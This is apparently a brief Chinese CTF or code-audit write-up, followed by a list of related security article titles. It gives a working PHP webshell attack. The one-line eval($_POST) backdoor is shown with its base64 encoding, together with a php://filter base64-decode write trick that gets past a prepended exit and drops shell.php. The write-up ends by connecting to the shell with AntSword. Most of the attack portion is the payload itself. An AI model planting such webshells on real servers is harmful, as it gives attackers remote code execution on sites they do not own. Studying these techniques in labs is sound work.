代码审计,发现写进去的东西会加上exit,这样的话后面的内容就不能执,那就写个过滤器进行绕过,重点是考虑一下base64的解码位置,构造一句话木马,
使用base64的话
<?php eval($_POST['a']);
Base64 编码后:PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7
需要给前面随便补充一位,过滤器是php://filter/write=convert.base64-decode/resource=shell.php
写入成功后用蚁剑连接
相关推荐
咸鱼菲菲36 分钟前
KhPRF介绍white-persist5 小时前
【内网运维】Netstat与Wireshark:内网运维溯源实战解析刘婉晴5 小时前
【Kali 渗透测试】环境搭建@Ma6 小时前
基于dify+memobase实现带永久记忆功能AI智能微信客服系统(安全无风控无封号)pps-key6 小时前
网络安全教学体系构建与实施方案DeepVis Research6 小时前
【VR/OSINT】2018年度沉浸式元宇宙架构与开源情报(OSINT)桌面取证基准测试(含头号玩家/网络谜踪核心样本)乾元6 小时前
AI 在 BGP 池管理与路由安全(RPKI / ROA)中的自动化运用——服务提供商网络中“可验证路由”的工程化实现蓝之白6 小时前
Vulnhub_DC-8蓝之白6 小时前
流量分析_SnakeBackdoor-2Bruce_Liuxiaowei6 小时前
HTTPS真的安全吗?—— 使用 mitmproxy 中间人攻击破解 GitHub 登录会话